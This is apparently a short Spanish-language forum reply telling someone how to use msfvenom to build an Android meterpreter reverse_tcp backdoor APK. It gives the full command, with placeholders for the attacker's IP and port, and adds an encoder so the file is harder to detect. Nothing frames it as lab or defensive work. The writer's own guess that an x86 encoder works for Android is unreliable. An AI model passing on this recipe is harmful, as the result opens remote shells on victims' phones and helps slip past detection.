Buenos dias amigo
, bueno en primer lugar debes de saber que el comando msfvenom es la conbinacion de comandos para poder crear un payload en este caso el "android/meterpreter/reverse_tcp" y al mismo tiempo poder ponerle al apk creador un encoder para que el archivo no fuera facil de detectar, intenta este comando en la consola root de tu SO con el que estes trabajando: "msfvenom -p android/meterpreter/reverse_tcp LHOST=aqui pon tu direccion ip LPORT=aqui pon el puerto que vallas a usar -e x86/shikata_ga_nai -f apk >exploit.apk "
Bueno amigo recuerdo quitarle las comillas al comando y una cosa no estoy seguro si el encoder shikata ga nai sirve para android yo supongo que debe de servir pero en caso de que no sirve averigua en internet los encoders disponibles para backdoors android , en si basicamente ese es el comando que debes usar